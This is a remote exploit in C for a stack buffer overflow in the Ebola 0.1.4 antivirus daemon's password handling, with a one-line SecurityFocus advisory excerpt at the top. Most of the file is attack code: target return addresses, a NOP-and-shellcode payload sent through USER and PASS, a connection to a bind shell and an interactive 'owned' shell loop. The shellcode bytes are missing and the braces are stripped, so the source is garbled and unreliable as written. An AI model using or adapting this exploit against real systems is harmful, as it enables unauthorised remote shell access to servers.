// source: https://www.securityfocus.com/bid/9156/info
It has been reported that a buffer overflow condition is present in the authentication mechanism implemented in Ebola. The condition is due to the use of the C library function sprintf() to construct an error message when authentication is not successful. According to the discoverer of this flaw, the vulnerability is remotely exploitable.
/* 0x333ebola.c => ebola 0.1.4 remote exploit
* Ebola 0.1.4 remote stack overflow exploit,
* bug found by "Secure Network Operations".
* Here the bugged code :
* [...]
* int handle_PASS( int ssocket, char *sentline ){
* char *passwd;
* char outstr[100];
* [...]
* else {
* sprintf(outstr,"PASS NOT ACCEPTED for user \"%s\", pass \"%s\".\n",username,passwd);
* write(ssocket,outstr,strlen(outstr));
* }
* [...]
* Technical details :
* - system : Red Hat Linux 8.0
* - package : ebola-0.1.4.tar.gz (from : http://pldaniels.com/ebola/)
* - requires : libsavi (libsavi.so. (from http://www.sophos.com)
* Note : the exploit is unstable.
* coded by c0wboy
* (c) 0x333 Outsider Security Labs 2003 / www.0x333.org
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#define EBOLA 1665
#define SHELL 5074
#define MAX_TG 2
int fdsocket, debug = 0x0;
struct sockaddr_in anger;
struct hostent * cya;
struct {
char *os; /* system os */
char *descpr; /* ebola infos */
int ret; /* return address */
int align; /* align the buffer */
} ebola[] = {
{ "RedHat 8.0 (Psyche)", "ebola-0.1.4.tar.gz", 0xbfffea1c, 3 },
{ "Generic Linux Test ", "generic ebola!", 0x41414141, 0x0 },
{ "exploit code", "outsiders security labs", 0x333, 0x333 },
unsigned char shellcode_1[] =
unsigned char shellcode_2[] =
void list(void);
void banner(void);
void usage(char *);
void warning(char *);
int ebol4(char *, int, int, int);
int connection(char *, int);
int owned(int);
void list (void)
int i;
fprintf (stderr, "\n _(0x0)_ targets _(0x0)_\n");
fprintf (stderr, " ----------------------- \n");
for (i=0; ebola[i].ret != 0x333; i++)
fprintf (stderr, " _(%d)_ %s [%s]\n", i, ebola[i].os, ebola[i].descpr);
fprintf (stderr, "\n");
void banner (void)
fprintf (stdout, "\n --- 0x333ebola => ebola-0.1.4 remote exploit ---\n");
fprintf (stdout, " --- Outsiders Se(c)urity Labs 2003 ---\n\n");
void usage (char *prg)
fprintf (stderr, " Usage : %s [-d hostname] [-p port] [-t target] [-l] [-V] [-h]\n\n", prg);
fprintf (stderr, "\t-d :\thost to attack\n");
fprintf (stderr, "\t-p :\tebola's port (default %d)\n", EBOLA);
fprintf (stderr, "\t-t :\tselect a target\n");
fprintf (stderr, "\t-l :\tlist targets\n");
fprintf (stderr, "\t-V :\tdebug mode\n");
fprintf (stderr, "\t-h :\tdisplay this help\n\n");
void warning (char *error)
fprintf (stderr, "%s", error);
close (fdsocket);
int ebol4 (char *target, int port, int ret, int align)
int i;
char snd[1024]="", rcv[1024]="";
char buf1[92], buf2[101];
int *ebol = (int *)(buf2 + align);
if (connection(target, port)) /* connect to server */
warning ("\n _(0x666)_ Error in connecting to server\n");
fprintf (stdout, " _(0x1)_ Connected (!)\n");
/* create buffer */
memset ((char *)buf1, 0x90, sizeof(buf1));
memcpy ((char *)buf1, shellcode_1, strlen(shellcode_1));
memset ((char *)buf2, 0x90, sizeof(buf2));
for (i=0; i<15; i+=4, *ebol++ = ret);
memcpy ((char *)buf2+15+12, shellcode_2, strlen(shellcode_2));
recv (fdsocket, rcv, sizeof(rcv), 0x0);
if (debug)
fprintf (stdout, "\n <debug> server resp. : %s\n", rcv);
fprintf (stdout, " _(0x2)_ Sending USER (shellcode_1)\n");
sprintf (snd, "USER %s\n", buf1);
write (fdsocket, snd, strlen(snd));
recv (fdsocket, rcv, sizeof(rcv), 0x0);
if (debug)
fprintf (stdout, " <debug> [w8ing ...] run gdb then press [ENTER]\n");
fprintf (stdout, " _(0x3)_ Sending PASS (shellcode_2)\n\n");
sprintf (snd, "PASS %s\n", buf2);
write (fdsocket, snd, strlen(snd));
recv (fdsocket, rcv, sizeof(rcv), 0x0);
if (debug)
fprintf (stdout, " <debug> server resp. : %s\n", rcv);
close (fdsocket);
if (!(connection(target, SHELL)))
return 0x666;
return 0x333;
int connection (char *target, int port)
anger.sin_family = AF_INET;
anger.sin_port = htons(port);
cya = gethostbyname(target);
if (cya==0x0)
return 0x1;
bcopy (cya->h_addr, &anger.sin_addr, cya->h_length);
if ((fdsocket = socket (AF_INET, SOCK_STREAM, 0x0)) < 0x0)
return 0x1;
if ((connect (fdsocket, (struct sockaddr*)&anger, sizeof(anger))) < 0x0)
return 0x1;
return 0x0;
int owned (int fdsocket)
int i;
fd_set hate;
char outside[1024];
char *cmd="uname -a;id;\n\n";
FD_ZERO (&hate);
FD_SET (fdsocket, &hate);
FD_SET (0, &hate);
fprintf (stdout, " (======owned======) (======owned======) (======owned======)\n\n");
send (fdsocket, cmd, strlen(cmd), 0x0);
FD_SET (fdsocket, &hate);
FD_SET (0, &hate);
if (select(FD_SETSIZE, &hate, NULL, NULL, NULL) < 0x0)
if (FD_ISSET(fdsocket, &hate))
if ((i = recv(fdsocket, outside, sizeof(outside)-1, 0x0)) < 0x0)
warning (" _(0x333)_ cya hax0r\n");
if (write(1, outside, i) < 0x0)
if (FD_ISSET(0x0, &hate))
if ((i = read(0x0, outside, sizeof (outside)-1)) < 0x0)
warning(" _(0x333)_ cya hax0r\n");
if (send(fdsocket, outside, i, 0x0) < 0x0)
fprintf (stderr, " _(0x333)_ cya hax0r\n");
return 0;
int main (int argc, char **argv)
int c, i = -1, port = EBOLA;
char *target =NULL;
while ((c = getopt(argc, argv, "hVlt:d:p:")) != EOF)
switch (c)
case 'p' : port = atoi(optarg); break;
case 'd' : target = optarg; break;
case 't' :
i = atoi(optarg);
if (i<0 || i>MAX_TG-1)
case 'l' : list(); break;
case 'V' : debug = 0x1; break;
case 'h' :
default : usage(argv[0]);
if (target == NULL || i == -1)
fprintf (stdout, " _(0x0)_ Exploiting <%s:%d> on %s\n", target, port, ebola[i].os);
if ((ebol4(target, port, ebola[i].ret, ebola[i].align)) == 0x333)
return 0;
warning ("\n _(0x666)_ Exploitation Failed !\n\n");